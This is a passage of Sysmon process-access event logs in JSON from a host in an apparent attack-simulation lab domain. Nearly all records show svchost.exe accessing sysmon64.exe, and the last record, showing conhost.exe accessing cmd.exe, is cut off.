C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1850,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1851,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1852,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1853,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1854,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1855,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1856,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1857,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.719\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010B4BC0300}\r\nTargetProcessId: 3724\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 